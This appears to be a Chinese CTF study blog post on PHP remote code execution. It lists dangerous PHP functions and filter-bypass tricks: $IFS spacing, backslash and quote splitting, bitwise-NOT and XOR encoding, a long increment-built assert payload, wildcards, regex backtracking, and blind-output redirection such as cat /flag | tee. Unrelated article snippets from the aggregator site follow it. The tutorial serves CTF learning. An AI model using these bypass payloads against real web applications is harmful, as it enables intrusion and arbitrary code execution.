当前位置：首页 > article >正文

RCE漏洞学习

article 2026/1/26 7:08:18

1，What is RCE？

在CTF（Capture The Flag）竞赛中，RCE漏洞指的是远程代码执行漏洞（Remote Code Execution）。这类漏洞允许攻击者通过某种方式在目标系统上执行任意代码，从而完全控制目标系统或获取敏感信息。RCE漏洞通常是非常严重的漏洞，因为它们可以直接导致系统被攻陷。

2，How to find a RCE？

要能执行漏洞，那就肯定要了解能执行漏洞的函数

1.系统命令执行函数

system()：能将字符串作为OS命令执行，且返回命令执行结果；
exec()：能将字符串作为OS命令执行，但是只返回执行结果的最后一行(约等于无回显)；
shell_exec()：能将字符串作为OS命令执行
passthru()：能将字符串作为OS命令执行，只调用命令不返回任何结果，但把命令的运行结果原样输出到标准输出设备上；
popen()：打开进程文件指针
proc_open()：与popen()类似
pcntl_exec()：在当前进程空间执行指定程序；
反引号``：反引号``内的字符串会被解析为OS命令；

2.代码执行函数

eval()：将字符串作为php代码执行；
assert()：将字符串作为php代码执行；
preg_replace()：正则匹配替换字符串；
create_function()：主要创建匿名函数；
call_user_func()：回调函数，第一个参数为函数名，第二个参数为函数的参数；
call_user_func_array()：回调函数，第一个参数为函数名，第二个参数为函数参数的数组；
可变函数：若变量后有括号，该变量会被当做函数名为变量值(前提是该变量值是存在的函数名)的函数执行；

For example

[SWPUCTF 2021 新生赛]babyrce

从php代码可以知道要让admin的cookie等于1

然后尝试访问这个php文件

一个典型的rce注入，过滤了空格，可以用$IFS$6绕过

然后我们就可以进行命令执行，在根目录下找到了flag

这样一道简单的RCE就做完了（我说白了，我白说了，这才像新生题）

这样也可以看出来，RCE就是靶机上会给出命令执行函数（一般情况下），再加上一些过滤就构成了一般的RCE（二般的我不敢说话）

3，RCE by pass

由此可见RCE的绕过方式相当重要，那我问你，你学不学

1，逻辑运算符

由于php是在c语言上衍生的一门编程语言，所以逻辑运算符是与c差不多的

逻辑运算符	例子	描述
&	A&B	执行A和B
&&	A&&B	当A为真时执行B
；	A;B	从左到右执行AB
\|	A\|B	显示B的执行结果
\|\|	A\|\|B	当A为假时执行B

以pikachu靶场为例(因为靶机时windows系统，所以用dir查看命令

（| 只显示后一个命令的执行）

（&两个都执行）

2，空格绕过

这里有如下几种方式

$IFS$6,${IFS}
< 重新定向符例子 cat</etc/passwd
\t，%09（水平制表符）
%20，\x20 url解码和16进制中的空格

例题 [MoeCTF 2021]babyRCE

可以看到过滤了空格和一些系统命令，这里的空格只有用第一中方式

然后cat等命令用下面要将的反斜杠绕过

3，反斜杠\绕过

如上题所示，当面对一些系统命令被过滤掉，而反斜杠没有被过滤，就可以用这钟绕过

如 cat-->c\at flag-->fl\ag

4,取反绕过

什么是去取反？

php语言中"~$a"会将变量a的值取反将字符或字符串进行按位取反，从而生成新的字符或字符串。(比如0101 --> 1010)

而利用方法就是先取反，在取回来就行了（适用于~没有被过滤）

所以就可以用

?cmd=(~%8C%86%8C%8B%9A%92)(~%9C%9E%8B%DF%D0%99%93%9E%98);

作为传递的参数

5,异或绕过

我们都知道异或运算符^

而效果就是 1001^0111=1110 即对应位相同为0，不同为1，而且这个运算是可逆的

所以我们可以通过用异或运算的方法来绕过

比如 a='system'^'whatcanisay'

那我们要得到system就要传入a^'whatcanisay'就行了

6，自增绕过

这个相当有趣

比如我们令$_=[],这样就会得到一个名为_的空数组

而在php中，创建数组用Array

那我们输出echo "$_"会怎么样

这样就从无字符到有字符了，再用$_="$_",配合上@==&返回0,所以就能访问到A

再将A赋值给$_,并自增

现在发现$_变成了B（ASCII值＋1）

原理懂了我们直接看payload

//自增payload，assert($_POST[_]),命令传入_$_=[];$_=@"$_";$_=$_['!'=='@'];$___=$_;$__=$_;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$___.=$__;$___.=$__;$__=$_;$__++;$__++;$__++;$__++;$___.=$__;$__=$_;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$___.=$__;$__=$_;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$___.=$__;$____='_';$__=$_;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$____.=$__;$__=$_;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$____.=$__;$__=$_;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$____.=$__;$__=$_;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$____.=$__;$_=$$____;$___($_[_]);&_=phpinfo();

这不就稳稳拿下了吗

7，变量拼接

有些时候我们也可以自己命名一个变量

比如变量cmd中会正则匹配flag字符串

那我们就可以传入?a=flag&cmd=cat $a

同时也可以字符串拼接，比如s.y.s.t.e.m

8,base和hex编码绕过

之前学的管道符|就发挥作用了，比如我我们将system用base64编码，传入后再用base64解码不久可以了吗？

总之，这两种方法的思想无异于就是先转为16进制或者base再转回来

9，正则匹配绕过

//如flag被过滤
cat /f???
cat /fl*
cat /f[a-z]{3}

这三种都是shell通配符

10，引号绕过

//如cat、ls被过滤
ca""t /flag
l's' /

感觉与反斜杠绕过同理，就是将关键词分隔开

11，命令替换

如果cat被过滤了还可以用如下的东西替代

12，回溯绕过

适用于php正则匹配绕过

//php正则的回溯次数大于1000000次时返回False
$a = 'hello world'+'h'*1000000
preg_match("/hello.*world/is",$a) == False

13，无回显RCE

//无回显RCE，如exce()函数，可将执行结果输出到文件再访问文件执行以下命令后访问1.txt即可
ls / | tee 1.txt
cat /flag | tee 2.txt
//eval()无输出
eval(print`c\at /flag`;)

RCE漏洞学习

1，What is RCE？ 在CTF（Capture The Flag）竞赛中，RCE漏洞指的是远程代码执行漏洞（Remote Code Execution）。这类漏洞允许攻击者通过某种方式在目标系统上执行任意代码，从而完全控制目…...

编程日记 2026/1/26 7:08:18

如何将网页保存为pdf

要将网页保存为PDF，可以按照以下几种方法操作： 1. 使用浏览器的打印功能大多数现代浏览器（如Chrome、Firefox、Edge等）都支持将网页保存为PDF文件。步骤如下： 在 Google Chrome 中： 打开你想保存为PDF…...

编程日记 2025/9/10 16:26:02

什么是继承？js中有哪儿些继承？

1、什么是继承？ 继承是面向对象软件技术中的一个概念。 2、js中有哪儿些继承？ js中的继承有ES6的类class的继承、原型链继承、构造函数继承、组合继承、寄生组合继承。 2.1 ES6中类的继承 class Parent {constructor() {this.age 18;} }class Chil…...

编程日记 2026/1/16 19:52:45

如何使用 Grafana 连接 Easyearch

Grafana 介绍 Grafana 是一款开源的跨平台数据可视化与监控分析工具，专为时序数据（如服务器性能指标、应用程序日志、业务数据等）设计。它通过直观的仪表盘（Dashboards）帮助用户实时监控系统状态、分析趋势&#xff0…...

编程日记 2026/1/22 13:55:53

mindsdb AI 开源的查询引擎 - 用于构建 AI 的平台，该平台可以学习和回答大规模联合数据的问题。

一、软件介绍文末提供源码和程序下载学习 MindsDB 是一种解决方案，使人类、AI、代理和应用程序能够以自然语言和 SQL 查询数据，并在不同的数据源和类型中获得高度准确的答案。此开源程序是一个联合查询引擎，可以整理您的数据蔓延混乱&#…...

编程日记 2026/1/22 16:46:08

ofdm_demo.py import numpy as np from scipy import interpolate import commpy as cpy import ofdm_debug as ofdm_debug class OFDMSystem:def __init__(self, K64, CPNone, P8, pilotValue33j, Modulation_typeQAM16, channel_typerandom, SNRdb25,debugFalse):# 设置OFDM…...

编程日记 2025/12/20 17:37:35

BOTA六维力矩传感器如何打通机器人AI力控操作的三层架构？感知-决策-执行全链路揭秘

想象一下，你对着一个机器人说：“请帮我泡杯茶。”然后，它就真的开始行动了：找茶壶、烧水、取茶叶、泡茶……这一切看似简单，但背后却隐藏着复杂的AI技术。今天，我们就来揭秘BOTA六维力矩传感器在机器人操控…...

编程日记 2026/1/22 14:34:09

HDF5文件格式：数据类型与读写功能详解

HDF5文件格式：数据类型与读写功能详解 HDF5简介 HDF5（Hierarchical Data Format version 5）是一种用于存储和管理大量科学数据的文件格式和库。它由美国国家高级计算应用中心（NCSA）开发，具有以下特点&…...

编程日记 2025/12/27 7:10:30

macOS Chrome - 打开开发者工具，设置 Local storage

文章目录 macOS Chrome - 打开开发者工具设置 Local storage macOS Chrome - 打开开发者工具方式2：右键点击网页，选择检查设置 Local storage 选择要设置的 url，显示右侧面板双击面板，输入要添加的内容 2025-04-08&#xff…...

编程日记 2026/1/23 9:11:39

使用Vscode排除一些子文件搜索

打开用户/工作区设置全局生效：打开命令面板（CtrlShiftP 或 CmdShiftP），搜索并选择 Preferences: Open User Settings (JSON)。仅当前项目生效：在项目根目录下创建 .vscode/settings.json 文件（如果不存在…...

编程日记 2026/1/3 11:29:04

kubernetes 入门篇之架构介绍

经过前段时间的学习和实践，对k8s的架构有了一个大致的理解。 1. k8s 分层架构架构层级核心组件控制平面层etcd、API Server、Scheduler、Controller Manager工作节点层Kubelet、Kube-proxy、CRI（容器运行时接口）、CNI（网络插件&…...

编程日记 2026/1/23 3:36:06

如何绕过WAF实现SQL注入攻击？

引言在渗透测试中，SQL注入（SQLi）始终是Web安全的核心漏洞之一。然而，随着企业广泛部署Web应用防火墙（WAF），传统的注入攻击往往会被拦截。本文将分享一种绕过WAF检测的SQL注入技巧…...

编程日记 2025/11/30 13:22:25

如何使用通义灵码完成PHP单元测试 - AI辅助开发教程

一、引言在软件开发过程中，测试是至关重要的一环。然而，在传统开发中，测试常常被忽略或草草处理，很多时候并非开发人员故意为之，而是缺乏相应的测试思路和方法，不知道如何设计测试用例。随着 AI 技术的飞…...

编程日记 2026/1/25 0:28:25

pig 权限管理开源项目学习

pig 源码 https://github.com/pig-mesh/pig 文档在其中，前端在文档中，官方视频教学也在文档中有。第一次搭建，建议直接去看单体视频，照着做即可，需 mysql，redis 基础。文章目录项目结构Maven 多模块项…...

编程日记 2026/1/23 11:01:53

设计模式：依赖倒转原则 - 依赖抽象，解耦具体实现

一、为什么用依赖倒转原则？ 在软件开发中，类与类之间的依赖关系是架构设计中的关键。如果依赖过于紧密，系统的扩展性和维护性将受到限制。为了应对这一挑战，依赖倒转原则（Dependency Inversion Principle，…...

编程日记 2025/11/26 1:39:29

探秘Transformer系列之（26）--- KV Cache优化之 PD分离or合并

探秘Transformer系列之（26）— KV Cache优化之 PD分离or合并文章目录探秘Transformer系列之（26）--- KV Cache优化之 PD分离or合并0x00 概述0x01 背景知识1.1 自回归&迭代1.2 KV Cache 0x02 静态批处理2.1 调度策略2.2 问题…...

编程日记 2026/1/25 11:28:11

鸿蒙5.0 非桌面页面，设备来电后挂断，自动返回桌面

1.背景其实在Android上面打开一个应用，然后设备来电后挂断应该是返回到前面打开的这个应用的，但是在鸿蒙里面现象是直接返回桌面，设计如此 2.分析这个分析需要前置知识，鸿蒙的任务栈页面栈，具体参考如下链接： zh-cn/application-dev/application-models/page-missio…...

编程日记 2025/11/14 1:07:20

C++语言程序设计——02 变量与数据类型

目录一、变量与数据类型（一）变量的数据类型（二）变量命名规则（三）定义变量（四）变量赋值（五）查看数据类型二、ASCII码三、进制表示与转换（一&…...

编程日记 2026/1/23 12:31:05

Model Context Protocol (MCP) - 尝试创建和测试一下MCP Server

1.简单介绍 MCP是Model Context Protocol的缩写，是Anthropic开源的一个标准协议。MCP使得大语言模型可以和外部的数据源，工具进行集成。当前MCP在社区逐渐地流行起来了。同时official C# SDK(仓库是csharp-sdk) 也在不断更新中，目前最新版本…...

编程日记 2026/1/23 11:29:55

十四种逻辑器件综合对比——《器件手册--逻辑器件》

目录逻辑器件简述按功能分类按工艺分类按电平分类特殊功能逻辑器件应用领域详尽阐述 1 逻辑门一、基本概念二、主要类型三、实现方式四、应用领域 2 反相器工作原理基本功能主要应用常见类型特点未来发展趋势 3 锁存器基本概念工作原理主要类型…...

编程日记 2026/1/19 8:25:56

将已有 SVN 服务打包成 Docker 镜像的详细步骤

将已有 SVN 服务打包成 Docker 镜像的详细步骤一、服务器环境准备在开始将 SVN 服务打包成 Docker 镜像之前，我们需要确保目标服务器的环境满足一定条件。首先要确保目标服务器已安装 Docker。同时服务器可以连接互联网，可以通过以下简单命令来验证…...

编程日记 2026/1/19 5:02:58

python文件打包无法导入ultralytics模块

💥打包的 .exe 闪退了？别慌！教你逐步排查 PyInstaller 打包的所有错误！ 🛠 运行 .exe 查看报错信息✅ 正确姿势： ⚠ importlib 动态导入导致打包失败❓什么是动态导入？✅ 解决方式： …...

编程日记 2026/1/23 12:15:12

AMBA-CHI协议详解（二十六）

AMBA-CHI协议详解（一）- Introduction AMBA-CHI协议详解（二）- Channel fields / Read transactions AMBA-CHI协议详解（三）- Write transactions AMBA-CHI协议详解（四）- Other transactions AMBA-CHI协议详解（五）- Transaction identifier fields AMBA-CHI协议详解（六…...

编程日记 2026/1/23 10:24:24

Go小技巧易错点100例（二十六）

本期分享： 1. string转[]byte是否会发生内存拷贝 2. Go程序获取文件的哈希值正文： string转[]byte是否会发生内存拷贝在Go语言中，字符串转换为字节数组（[]byte）确实会发生内存拷贝。这是因为在Go中，字…...

编程日记 2026/1/23 9:33:20

FPGA_BD Block Design学习（一）

PS端开发流程详细步骤 1.第一步：打开Vivado软件，创建或打开一个工程。 2.第二步：在Block Design中添加arm核心，并将其配置为IP核。 3.第三步：配置arm核心的外设信息，如DDR接口、时钟频率、UART接口等。 …...

编程日记 2026/1/23 12:00:32

ubuntu20.04+qt5.12.8安装serialbus

先从官网https://download.qt.io/archive/qt/5.12/5.12.8/submodules/ 下载 qtserialbus-everywhere-src-5.12.8.tar.xz 有需要其他版本的点击返回上一级自行寻找对应版本。也可从 https://download.csdn.net/download/zhouhui1982/90595810 下载在终端中依次输入以下命令…...

编程日记 2026/1/23 11:35:05

银河麒麟V10 Ollama+ShellGPT打造Shell AI助手——筑梦之路

环境说明 1. 操作系统版本: 银河麒麟V10 2. CPU架构：X86 3. Python版本：3.12.9 4. 大模型：mistral:7b-instruct 准备工作 1. 编译安装python 3.12 # 下载python 源码wget https://www.python.org/ftp/python/3.12.9/Python-3.12.9.tg…...

编程日记 2025/9/11 0:22:36

python求π近似值

【问题描述】用公式π/4≈1-1/31/5-1/7..1/(2*N-1).求圆周率PI的近似值。从键盘输入一个整数N值，利用上述公式计算出π的近似值，然后输出π值，保留小数后8位。【样例输入】1000 【样例输出】3.14059265 def countpi(N):p0040nowid0for i i…...

编程日记 2025/9/11 16:10:30

基于 Spring Boot + Vue 的 [业务场景] 管理系统设计与实现

技术范围：SpringBoot、Vue、SSM、HLMT、Jsp、PHP、Nodejs、Python、爬虫、数据可视化、小程序、安卓app、大数据、物联网、机器学习等设计与开发。主要内容：免费功能设计、开题报告、任务书、中期检查PPT、系统功能实现、代码编写、论文编写和辅导、论文…...

编程日记 2025/10/31 8:11:02

如何查看自己抖音的IP属地？详细教程+常见问题解答

在当今互联网时代，IP属地信息已成为各大社交平台（如抖音、微博、快手等）展示用户真实网络位置的重要功能。无论是出于隐私保护、账号安全，还是单纯好奇自己的IP归属地，了解如何查看抖音IP属地都很有必要。本文将详细介…...

编程日记 2026/1/23 12:13:48